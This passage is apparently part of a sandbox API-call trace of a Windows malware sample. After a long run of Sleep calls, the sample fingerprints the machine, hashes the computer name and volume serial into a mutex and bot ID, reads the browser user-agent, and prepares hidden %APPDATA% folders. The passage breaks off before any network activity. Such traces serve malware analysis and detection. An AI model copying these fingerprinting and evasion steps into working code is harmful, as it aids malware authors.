(dwMilliseconds=0xa) [0120.933] Sleep (dwMilliseconds=0xa) [0120.954] Sleep (dwMilliseconds=0xa) [0120.970] Sleep (dwMilliseconds=0xa) [0120.986] Sleep (dwMilliseconds=0xa) [0121.048] Sleep (dwMilliseconds=0xa) [0121.095] Sleep (dwMilliseconds=0xa) [0121.120] Sleep (dwMilliseconds=0xa) [0121.142] Sleep (dwMilliseconds=0xa) [0121.157] Sleep (dwMilliseconds=0xa) [0121.173] Sleep (dwMilliseconds=0xa) [0121.189] Sleep (dwMilliseconds=0xa) [0121.204] Sleep (dwMilliseconds=0xa) [0121.220] Sleep (dwMilliseconds=0xa) [0121.235] Sleep (dwMilliseconds=0xa) [0121.284] Sleep (dwMilliseconds=0xa) [0121.309] Sleep (dwMilliseconds=0xa) [0121.329] Sleep (dwMilliseconds=0xa) [0121.345] Sleep (dwMilliseconds=0xa) [0121.361] Sleep (dwMilliseconds=0xa) [0121.396] Sleep (dwMilliseconds=0xa) [0121.408] Sleep (dwMilliseconds=0xa) [0121.471] Sleep (dwMilliseconds=0xa) [0121.500] Sleep (dwMilliseconds=0xa) [0121.517] Sleep (dwMilliseconds=0xa) [0121.534] Sleep (dwMilliseconds=0xa) [0121.548] Sleep (dwMilliseconds=0xa) [0121.564] Sleep (dwMilliseconds=0xa) [0121.579] Sleep (dwMilliseconds=0xa) [0121.595] Sleep (dwMilliseconds=0xa) [0121.610] Sleep (dwMilliseconds=0xa) [0121.685] Sleep (dwMilliseconds=0xa) [0121.720] Sleep (dwMilliseconds=0xa) [0121.736] Sleep (dwMilliseconds=0xa) [0121.751] Sleep (dwMilliseconds=0xa) [0121.767] Sleep (dwMilliseconds=0xa) [0121.782] Sleep (dwMilliseconds=0xa) [0121.798] Sleep (dwMilliseconds=0xa) [0121.814] Sleep (dwMilliseconds=0xa) [0121.876] Sleep (dwMilliseconds=0xa) [0121.909] Sleep (dwMilliseconds=0xa) [0121.923] Sleep (dwMilliseconds=0xa) [0121.939] Sleep (dwMilliseconds=0xa) [0121.954] Sleep (dwMilliseconds=0xa) [0121.970] Sleep (dwMilliseconds=0xa) [0121.986] Sleep (dwMilliseconds=0xa) [0122.001] Sleep (dwMilliseconds=0xa) [0122.017] Sleep (dwMilliseconds=0xa) [0122.064] Sleep (dwMilliseconds=0xa) [0122.103] Sleep (dwMilliseconds=0xa) [0122.126] Sleep (dwMilliseconds=0xa) [0122.142] Sleep (dwMilliseconds=0xa) [0122.157] Sleep (dwMilliseconds=0xa) [0122.173] Sleep (dwMilliseconds=0xa) [0122.229] Sleep (dwMilliseconds=0xa) [0122.306] Sleep (dwMilliseconds=0xa) [0122.346] Sleep (dwMilliseconds=0xa) [0122.361] Sleep (dwMilliseconds=0xa) [0122.376] Sleep (dwMilliseconds=0xa) [0122.393] Sleep (dwMilliseconds=0xa) [0122.422] Sleep (dwMilliseconds=0xa) [0122.440] Sleep (dwMilliseconds=0xa) [0122.501] Sleep (dwMilliseconds=0xa) [0122.537] Sleep (dwMilliseconds=0xa) [0122.548] Sleep (dwMilliseconds=0xa) [0122.564] Sleep (dwMilliseconds=0xa) [0122.579] Sleep (dwMilliseconds=0xa) [0122.595] Sleep (dwMilliseconds=0xa) [0122.611] Sleep (dwMilliseconds=0xa) [0122.634] Sleep (dwMilliseconds=0xa) [0122.705] Sleep (dwMilliseconds=0xa) [0122.744] Sleep (dwMilliseconds=0xa) [0122.768] Sleep (dwMilliseconds=0xa) [0122.782] Sleep (dwMilliseconds=0xa) [0122.798] Sleep (dwMilliseconds=0xa) [0122.814] Sleep (dwMilliseconds=0xa) [0122.830] Sleep (dwMilliseconds=0xa) [0122.892] Sleep (dwMilliseconds=0xa) [0122.914] Sleep (dwMilliseconds=0xa) [0122.939] Sleep (dwMilliseconds=0xa) [0122.954] Sleep (dwMilliseconds=0xa) [0122.970] Sleep (dwMilliseconds=0xa) [0122.986] Sleep (dwMilliseconds=0xa) [0123.001] Sleep (dwMilliseconds=0xa) [0123.064] Sleep (dwMilliseconds=0xa) [0123.085] Sleep (dwMilliseconds=0xa) [0123.128] Sleep (dwMilliseconds=0xa) [0123.142] Sleep (dwMilliseconds=0xa) [0123.157] Sleep (dwMilliseconds=0xa) [0123.173] Sleep (dwMilliseconds=0xa) [0123.236] Sleep (dwMilliseconds=0xa) [0123.257] Sleep (dwMilliseconds=0xa) [0123.283] Sleep (dwMilliseconds=0xa) [0123.298] Sleep (dwMilliseconds=0xa) [0123.314] Sleep (dwMilliseconds=0xa) [0123.329] Sleep (dwMilliseconds=0xa) [0123.345] Sleep (dwMilliseconds=0xa) [0123.408] Sleep (dwMilliseconds=0xa) [0123.438] Sleep (dwMilliseconds=0xa) [0123.454] Sleep (dwMilliseconds=0xa) [0123.470] Sleep (dwMilliseconds=0xa) [0123.485] Sleep (dwMilliseconds=0xa) [0123.501] Sleep (dwMilliseconds=0xa) [0123.517] Sleep (dwMilliseconds=0xa) [0123.532] Sleep (dwMilliseconds=0xa) [0123.548] Sleep (dwMilliseconds=0xa) [0123.595] Sleep (dwMilliseconds=0xa) [0123.617] Sleep (dwMilliseconds=0xa) [0123.642] Sleep (dwMilliseconds=0xa) [0123.672] Sleep (dwMilliseconds=0xa) [0123.689] Sleep (dwMilliseconds=0xa) [0123.704] Sleep (dwMilliseconds=0xa) [0123.767] Sleep (dwMilliseconds=0xa) [0123.792] Sleep (dwMilliseconds=0xa) [0123.814] Sleep (dwMilliseconds=0xa) [0123.829] Sleep (dwMilliseconds=0xa) [0123.878] Sleep (dwMilliseconds=0xa) [0123.892] Sleep (dwMilliseconds=0xa) [0123.907] Sleep (dwMilliseconds=0xa) [0123.955] Sleep (dwMilliseconds=0xa) [0123.975] Sleep (dwMilliseconds=0xa) [0124.001] Sleep (dwMilliseconds=0xa) [0124.017] Sleep (dwMilliseconds=0xa) [0124.032] Sleep (dwMilliseconds=0xa) [0124.052] Sleep (dwMilliseconds=0xa) [0124.064] Sleep (dwMilliseconds=0xa) [0124.126] Sleep (dwMilliseconds=0xa) [0124.150] Sleep (dwMilliseconds=0xa) [0124.174] Sleep (dwMilliseconds=0xa) [0124.189] Sleep (dwMilliseconds=0xa) [0124.204] Sleep (dwMilliseconds=0xa) [0124.220] Sleep (dwMilliseconds=0xa) [0124.235] Sleep (dwMilliseconds=0xa) [0124.287] Sleep (dwMilliseconds=0xa) [0124.323] Sleep (dwMilliseconds=0xa) [0124.346] Sleep (dwMilliseconds=0xa) [0124.360] Sleep (dwMilliseconds=0xa) [0124.376] Sleep (dwMilliseconds=0xa) [0124.400] Sleep (dwMilliseconds=0xa) [0124.423] Sleep (dwMilliseconds=0xa) [0124.439] Sleep (dwMilliseconds=0xa) [0124.486] Sleep (dwMilliseconds=0xa) [0124.505] Sleep (dwMilliseconds=0xa) [0124.517] Sleep (dwMilliseconds=0xa) [0124.540] Sleep (dwMilliseconds=0xa) [0124.574] Sleep (dwMilliseconds=0xa) [0124.596] Sleep (dwMilliseconds=0xa) [0124.615] Sleep (dwMilliseconds=0xa) [0124.674] Sleep (dwMilliseconds=0xa) [0124.704] Sleep (dwMilliseconds=0xa) [0124.720] Sleep (dwMilliseconds=0xa) [0124.736] Sleep (dwMilliseconds=0xa) [0124.751] Sleep (dwMilliseconds=0xa) [0124.767] Sleep (dwMilliseconds=0xa) [0124.782] Sleep (dwMilliseconds=0xa) [0124.798] Sleep (dwMilliseconds=0xa) [0124.815] Sleep (dwMilliseconds=0xa) [0124.861] Sleep (dwMilliseconds=0xa) [0124.890] Sleep (dwMilliseconds=0xa) [0124.908] Sleep (dwMilliseconds=0xa) [0124.924] Sleep (dwMilliseconds=0xa) [0124.940] Sleep (dwMilliseconds=0xa) [0124.956] Sleep (dwMilliseconds=0xa) [0124.974] Sleep (dwMilliseconds=0xa) [0124.987] Sleep (dwMilliseconds=0xa) [0125.002] Sleep (dwMilliseconds=0xa) [0125.052] Sleep (dwMilliseconds=0xa) [0125.099] Sleep (dwMilliseconds=0xa) [0125.116] Sleep (dwMilliseconds=0xa) [0125.130] Sleep (dwMilliseconds=0xa) [0125.143] Sleep (dwMilliseconds=0xa) [0125.163] Sleep (dwMilliseconds=0xa) [0125.174] Sleep (dwMilliseconds=0xa) [0125.193] Sleep (dwMilliseconds=0xa) [0125.255] Sleep (dwMilliseconds=0xa) [0125.302] Sleep (dwMilliseconds=0xa) [0125.318] Sleep (dwMilliseconds=0xa) [0125.334] Sleep (dwMilliseconds=0xa) [0125.346] Sleep (dwMilliseconds=0xa) [0125.364] Sleep (dwMilliseconds=0xa) [0125.380] Sleep (dwMilliseconds=0xa) [0125.407] Sleep (dwMilliseconds=0xa) [0125.456] Sleep (dwMilliseconds=0xa) [0125.502] Sleep (dwMilliseconds=0xa) [0125.521] Sleep (dwMilliseconds=0xa) [0125.533] Sleep (dwMilliseconds=0xa) [0125.553] Sleep (dwMilliseconds=0xa) [0125.567] Sleep (dwMilliseconds=0xa) [0125.580] Sleep (dwMilliseconds=0xa) [0125.596] Sleep (dwMilliseconds=0xa) [0125.707] Sleep (dwMilliseconds=0xa) [0125.805] Sleep (dwMilliseconds=0xa) [0125.831] Sleep (dwMilliseconds=0xa) [0125.846] Sleep (dwMilliseconds=0xa) [0125.864] Sleep (dwMilliseconds=0xa) [0125.912] Sleep (dwMilliseconds=0xa) [0125.945] Sleep (dwMilliseconds=0xa) [0125.971] Sleep (dwMilliseconds=0xa) [0125.987] Sleep (dwMilliseconds=0xa) [0126.010] Sleep (dwMilliseconds=0xa) [0126.034] Sleep (dwMilliseconds=0xa) [0126.096] Sleep (dwMilliseconds=0xa) [0126.125] Sleep (dwMilliseconds=0xa) [0126.143] Sleep (dwMilliseconds=0xa) [0126.159] Sleep (dwMilliseconds=0xa) [0126.175] Sleep (dwMilliseconds=0xa) [0126.191] Sleep (dwMilliseconds=0xa) [0126.205] Sleep (dwMilliseconds=0xa) [0126.221] Sleep (dwMilliseconds=0xa) [0126.238] Sleep (dwMilliseconds=0xa) [0126.284] Sleep (dwMilliseconds=0xa) [0126.324] Sleep (dwMilliseconds=0xa) [0126.347] Sleep (dwMilliseconds=0xa) [0126.362] Sleep (dwMilliseconds=0xa) [0126.378] Sleep (dwMilliseconds=0xa) [0126.403] Sleep (dwMilliseconds=0xa) [0126.425] Sleep (dwMilliseconds=0xa) [0126.440] Sleep (dwMilliseconds=0xa) [0126.487] Sleep (dwMilliseconds=0xa) [0126.507] Sleep (dwMilliseconds=0xa) [0126.518] Sleep (dwMilliseconds=0xa) [0126.533] Sleep (dwMilliseconds=0xa) [0126.549] Sleep (dwMilliseconds=0xa) [0126.567] Sleep (dwMilliseconds=0xa) [0126.580] Sleep (dwMilliseconds=0xa) [0126.596] Sleep (dwMilliseconds=0xa) [0126.612] Sleep (dwMilliseconds=0xa) [0126.687] Sleep (dwMilliseconds=0xa) [0126.709] Sleep (dwMilliseconds=0xa) [0126.721] Sleep (dwMilliseconds=0xa) [0126.737] Sleep (dwMilliseconds=0xa) [0126.752] Sleep (dwMilliseconds=0xa) [0126.768] Sleep (dwMilliseconds=0xa) [0126.786] Sleep (dwMilliseconds=0xa) [0126.800] Sleep (dwMilliseconds=0xa) [0126.815] Sleep (dwMilliseconds=0xa) [0126.862] Sleep (dwMilliseconds=0xa) [0126.893] Sleep (dwMilliseconds=0xa) [0126.909] Sleep (dwMilliseconds=0xa) [0126.925] Sleep (dwMilliseconds=0xa) [0126.940] Sleep (dwMilliseconds=0xa) [0126.956] Sleep (dwMilliseconds=0xa) [0126.972] Sleep (dwMilliseconds=0xa) [0126.987] Sleep (dwMilliseconds=0xa) [0127.002] Sleep (dwMilliseconds=0xa) [0127.050] Sleep (dwMilliseconds=0xa) [0127.086] Sleep (dwMilliseconds=0xa) [0127.112] Sleep (dwMilliseconds=0xa) [0127.133] Sleep (dwMilliseconds=0xa) [0127.159] Sleep (dwMilliseconds=0xa) [0127.174] Sleep (dwMilliseconds=0xa) [0127.238] Sleep (dwMilliseconds=0xa) [0127.288] Sleep (dwMilliseconds=0xa) [0127.299] Sleep (dwMilliseconds=0xa) [0127.315] Sleep (dwMilliseconds=0xa) [0127.330] Sleep (dwMilliseconds=0xa) [0127.346] Sleep (dwMilliseconds=0xa) [0127.362] Sleep (dwMilliseconds=0xa) [0127.377] Sleep (dwMilliseconds=0xa) [0127.402] Sleep (dwMilliseconds=0xa) [0127.444] Sleep (dwMilliseconds=0xa) [0127.487] Sleep (dwMilliseconds=0xa) [0127.502] Sleep (dwMilliseconds=0xa) [0127.518] Sleep (dwMilliseconds=0xa) [0127.534] Sleep (dwMilliseconds=0xa) [0127.550] Sleep (dwMilliseconds=0xa) [0127.565] Sleep (dwMilliseconds=0xa) [0127.581] Sleep (dwMilliseconds=0xa) [0127.596] Sleep (dwMilliseconds=0xa) [0127.643] Sleep (dwMilliseconds=0xa) [0127.692] Sleep (dwMilliseconds=0xa) [0127.705] Sleep (dwMilliseconds=0xa) [0127.721] Sleep (dwMilliseconds=0xa) [0127.737] Sleep (dwMilliseconds=0xa) [0127.752] Sleep (dwMilliseconds=0xa) [0127.768] Sleep (dwMilliseconds=0xa) [0127.783] Sleep (dwMilliseconds=0xa) [0127.799] Sleep (dwMilliseconds=0xa) [0127.846] Sleep (dwMilliseconds=0xa) [0127.891] Sleep (dwMilliseconds=0xa) [0127.913] Sleep (dwMilliseconds=0xa) [0127.924] Sleep (dwMilliseconds=0xa) [0127.940] Sleep (dwMilliseconds=0xa) [0127.956] Sleep (dwMilliseconds=0xa) [0127.971] Sleep (dwMilliseconds=0xa) [0127.987] Sleep (dwMilliseconds=0xa) [0128.002] Sleep (dwMilliseconds=0xa) [0128.049] Sleep (dwMilliseconds=0xa) [0128.077] Sleep (dwMilliseconds=0xa) [0128.097] Sleep (dwMilliseconds=0xa) [0128.113] Sleep (dwMilliseconds=0xa) [0128.238] Sleep (dwMilliseconds=0xa) [0128.285] Sleep (dwMilliseconds=0xa) [0128.307] Sleep (dwMilliseconds=0xa) [0128.330] Sleep (dwMilliseconds=0xa) [0128.346] Sleep (dwMilliseconds=0xa) [0128.362] Sleep (dwMilliseconds=0xa) [0128.377] Sleep (dwMilliseconds=0xa) [0128.403] Sleep (dwMilliseconds=0xa) [0128.440] Sleep (dwMilliseconds=0xa) [0128.488] Sleep (dwMilliseconds=0xa) [0128.502] Sleep (dwMilliseconds=0xa) [0128.518] Sleep (dwMilliseconds=0xa) [0128.533] Sleep (dwMilliseconds=0xa) [0128.549] Sleep (dwMilliseconds=0xa) [0128.565] Sleep (dwMilliseconds=0xa) [0128.581] Sleep (dwMilliseconds=0xa) [0128.630] Sleep (dwMilliseconds=0xa) [0128.688] Sleep (dwMilliseconds=0xa) [0128.705] Sleep (dwMilliseconds=0xa) [0128.722] Sleep (dwMilliseconds=0xa) [0128.737] Sleep (dwMilliseconds=0xa) [0128.753] Sleep (dwMilliseconds=0xa) [0128.768] Sleep (dwMilliseconds=0xa) [0128.784] Sleep (dwMilliseconds=0xa) [0128.800] Sleep (dwMilliseconds=0xa) [0128.846] Sleep (dwMilliseconds=0xa) [0128.886] Sleep (dwMilliseconds=0xa) [0128.909] Sleep (dwMilliseconds=0xa) [0128.924] Sleep (dwMilliseconds=0xa) [0128.940] Sleep (dwMilliseconds=0xa) [0128.955] Sleep (dwMilliseconds=0xa) [0128.971] Sleep (dwMilliseconds=0xa) [0129.021] Sleep (dwMilliseconds=0xa) [0129.065] Sleep (dwMilliseconds=0xa) [0129.080] Sleep (dwMilliseconds=0xa) [0129.096] Sleep (dwMilliseconds=0xa) [0129.112] Sleep (dwMilliseconds=0xa) [0129.129] Sleep (dwMilliseconds=0xa) [0129.144] Sleep (dwMilliseconds=0xa) [0129.159] Sleep (dwMilliseconds=0xa) [0129.221] Sleep (dwMilliseconds=0xa) [0129.260] Sleep (dwMilliseconds=0xa) [0129.284] Sleep (dwMilliseconds=0xa) [0129.300] Sleep (dwMilliseconds=0xa) [0129.315] Sleep (dwMilliseconds=0xa) [0129.331] Sleep (dwMilliseconds=0xa) [0129.349] Sleep (dwMilliseconds=0xa) [0129.362] Sleep (dwMilliseconds=0xa) [0129.409] Sleep (dwMilliseconds=0xa) [0129.472] Sleep (dwMilliseconds=0xa) [0129.487] Sleep (dwMilliseconds=0xa) [0129.503] Sleep (dwMilliseconds=0xa) [0129.526] Sleep (dwMilliseconds=0xa) [0129.549] Sleep (dwMilliseconds=0xa) [0129.565] Sleep (dwMilliseconds=0xa) [0129.628] Sleep (dwMilliseconds=0xa) [0129.663] Sleep (dwMilliseconds=0xa) [0129.694] Sleep (dwMilliseconds=0xa) [0129.705] Sleep (dwMilliseconds=0xa) [0129.722] Sleep (dwMilliseconds=0xa) [0129.737] Sleep (dwMilliseconds=0xa) [0129.754] Sleep (dwMilliseconds=0xa) [0129.769] Sleep (dwMilliseconds=0xa) [0129.818] Sleep (dwMilliseconds=0xa) [0129.858] Sleep (dwMilliseconds=0xa) [0129.878] Sleep (dwMilliseconds=0xa) [0129.889] Sleep (dwMilliseconds=0xa) [0129.899] Sleep (dwMilliseconds=0xa) [0129.910] Sleep (dwMilliseconds=0xa) [0129.933] Sleep (dwMilliseconds=0xa) [0129.951] Sleep (dwMilliseconds=0xa) [0129.964] Sleep (dwMilliseconds=0xa) [0130.014] Sleep (dwMilliseconds=0xa) [0130.060] Sleep (dwMilliseconds=0xa) [0130.073] Sleep (dwMilliseconds=0xa) [0130.089] Sleep (dwMilliseconds=0xa) [0130.122] Sleep (dwMilliseconds=0xa) [0130.135] Sleep (dwMilliseconds=0xa) [0130.153] Sleep (dwMilliseconds=0xa) [0130.216] Sleep (dwMilliseconds=0xa) [0130.264] Sleep (dwMilliseconds=0xa) [0130.277] Sleep (dwMilliseconds=0xa) [0130.292] Sleep (dwMilliseconds=0xa) [0130.309] Sleep (dwMilliseconds=0xa) [0130.323] Sleep (dwMilliseconds=0xa) [0130.338] Sleep (dwMilliseconds=0xa) [0130.356] Sleep (dwMilliseconds=0xa) [0130.370] Sleep (dwMilliseconds=0xa) [0130.385] Sleep (dwMilliseconds=0xa) [0130.433] Sleep (dwMilliseconds=0xa) [0130.461] Sleep (dwMilliseconds=0xa) [0130.479] Sleep (dwMilliseconds=0xa) [0130.495] Sleep (dwMilliseconds=0xa) [0130.558] Sleep (dwMilliseconds=0xa) [0130.573] Sleep (dwMilliseconds=0xa) [0130.621] Sleep (dwMilliseconds=0xa) [0130.641] Sleep (dwMilliseconds=0xa) [0130.667] Sleep (dwMilliseconds=0xa) [0130.689] Sleep (dwMilliseconds=0xa) [0130.728] Sleep (dwMilliseconds=0xa) [0130.792] Sleep (dwMilliseconds=0xa) [0130.839] Sleep (dwMilliseconds=0xa) [0130.854] Sleep (dwMilliseconds=0xa) [0130.870] Sleep (dwMilliseconds=0xa) [0130.887] Sleep (dwMilliseconds=0xa) [0130.902] GetSystemDirectoryA (in: lpBuffer=0x101efde0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0130.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" [0130.902] RtlGetVersion (in: lpVersionInformation=0x540457 | out: lpVersionInformation=0x540457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0130.903] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x101efdc8 | out: TokenHandle=0x101efdc8*=0x18ec) returned 1 [0130.903] GetTokenInformation (in: TokenHandle=0x18ec, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x101efdc0 | out: TokenInformation=0x0, ReturnLength=0x101efdc0) returned 0 [0130.903] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x25) returned 0x4a30830 [0130.903] GetTokenInformation (in: TokenHandle=0x18ec, TokenInformationClass=0x19, TokenInformation=0x4a30830, TokenInformationLength=0x1c, ReturnLength=0x101efdc0 | out: TokenInformation=0x4a30830, ReturnLength=0x101efdc0) returned 1 [0130.903] GetSidSubAuthorityCount (pSid=0x4a30840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x4a30841 [0130.903] GetSidSubAuthority (pSid=0x4a30840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x4a30848 [0130.903] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0x25 [0130.904] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0130.904] CloseHandle (hObject=0x18ec) returned 1 [0130.904] GetComputerNameA (in: lpBuffer=0x101efe90, nSize=0x101efed0 | out: lpBuffer="XC64ZB", nSize=0x101efed0) returned 1 [0130.904] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x101efec0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x101efec0*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0130.905] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x29) returned 0x4a30830 [0130.905] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x14) returned 0x4a30870 [0130.905] wsprintfA (in: param_1=0x4a30830, param_2="%s%08X%08X" | out: param_1="XC64ZB99FC78690C287F38") returned 22 [0130.905] CryptAcquireContextA (in: phProv=0x101efe18, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x101efe18*=0xa189650) returned 1 [0130.936] CryptCreateHash (in: hProv=0xa189650, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x101efe10 | out: phHash=0x101efe10) returned 1 [0130.937] lstrlenA (lpString="XC64ZB99FC78690C287F38") returned 22 [0130.937] CryptHashData (hHash=0xa024300, pbData=0x4a30830, dwDataLen=0x16, dwFlags=0x0) returned 1 [0130.937] CryptGetHashParam (in: hHash=0xa024300, dwParam=0x2, pbData=0x101efe20, pdwDataLen=0x101efe50, dwFlags=0x0 | out: pbData=0x101efe20, pdwDataLen=0x101efe50) returned 1 [0130.937] wsprintfA (in: param_1=0x54020c, param_2="%02X" | out: param_1="FE") returned 2 [0130.937] wsprintfA (in: param_1=0x54020e, param_2="%02X" | out: param_1="7F") returned 2 [0130.937] wsprintfA (in: param_1=0x540210, param_2="%02X" | out: param_1="15") returned 2 [0130.937] wsprintfA (in: param_1=0x540212, param_2="%02X" | out: param_1="06") returned 2 [0130.938] wsprintfA (in: param_1=0x540214, param_2="%02X" | out: param_1="0B") returned 2 [0130.938] wsprintfA (in: param_1=0x540216, param_2="%02X" | out: param_1="87") returned 2 [0130.938] wsprintfA (in: param_1=0x540218, param_2="%02X" | out: param_1="5F") returned 2 [0130.938] wsprintfA (in: param_1=0x54021a, param_2="%02X" | out: param_1="B9") returned 2 [0130.938] wsprintfA (in: param_1=0x54021c, param_2="%02X" | out: param_1="FB") returned 2 [0130.938] wsprintfA (in: param_1=0x54021e, param_2="%02X" | out: param_1="2A") returned 2 [0130.938] wsprintfA (in: param_1=0x540220, param_2="%02X" | out: param_1="49") returned 2 [0130.938] wsprintfA (in: param_1=0x540222, param_2="%02X" | out: param_1="F0") returned 2 [0130.938] wsprintfA (in: param_1=0x540224, param_2="%02X" | out: param_1="8D") returned 2 [0130.938] wsprintfA (in: param_1=0x540226, param_2="%02X" | out: param_1="5D") returned 2 [0130.938] wsprintfA (in: param_1=0x540228, param_2="%02X" | out: param_1="03") returned 2 [0130.938] wsprintfA (in: param_1=0x54022a, param_2="%02X" | out: param_1="12") returned 2 [0130.938] CryptDestroyHash (hHash=0xa024300) returned 1 [0130.938] CryptReleaseContext (hProv=0xa189650, dwFlags=0x0) returned 1 [0130.938] wsprintfA (in: param_1=0x54022c, param_2="%08X" | out: param_1="0C287F38") returned 8 [0130.938] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30870) returned 0x14 [0130.938] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30870) returned 1 [0130.938] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0x29 [0130.939] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0130.939] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0xe) returned 0x4a30830 [0130.939] wsprintfA (in: param_1=0x540dbe, param_2="%sFF" | out: param_1="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 42 [0130.939] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0xe [0130.939] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0130.939] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned 0x18ec [0130.939] RtlGetLastWin32Error () returned 0x0 [0130.939] GetTickCount () returned 0x1501be2 [0130.939] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x1008) returned 0x4a30830 [0130.939] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x2e) returned 0x4a31840 [0130.940] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x101efed8 | out: phkResult=0x101efed8*=0x18e8) returned 0x0 [0130.940] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x14) returned 0x4a31880 [0130.940] RegQueryValueExA (in: hKey=0x18e8, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0x101efe60, lpcbData=0x101efec0*=0x20 | out: lpType=0x0, lpData=0x101efe60*=0x31, lpcbData=0x101efec0*=0xd) returned 0x0 [0130.940] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31880) returned 0x14 [0130.940] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31880) returned 1 [0130.940] lstrlenA (lpString="11.0.10586.0") returned 12 [0130.940] lstrlenA (lpString=".") returned 1 [0130.940] atoi (_Str="11") returned 11 [0130.940] RegCloseKey (hKey=0x18e8) returned 0x0 [0130.940] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31840) returned 0x2e [0130.941] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31840) returned 1 [0130.941] ObtainUserAgentString (in: dwOption=0xb, pszUAOut=0x4a30830, cbSize=0x101efec0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0x101efec0) returned 0x0 [0130.989] lstrlenA (lpString="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 74 [0130.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4a30830, cbMultiByte=75, lpWideCharStr=0x540577, cchWideChar=150 | out: lpWideCharStr="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 75 [0130.990] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a30830) returned 0x1008 [0130.990] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a30830) returned 1 [0130.990] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x1008) returned 0x4a30830 [0130.991] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x1c) returned 0x4a31840 [0130.991] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x4a30830, nSize=0x105 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0130.991] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31840) returned 0x1c [0130.991] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31840) returned 1 [0130.991] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x16) returned 0x4a31840 [0130.991] wsprintfW (in: param_1=0x5407a6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 45 [0130.991] wsprintfW (in: param_1=0x540bb6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa") returned 45 [0130.991] 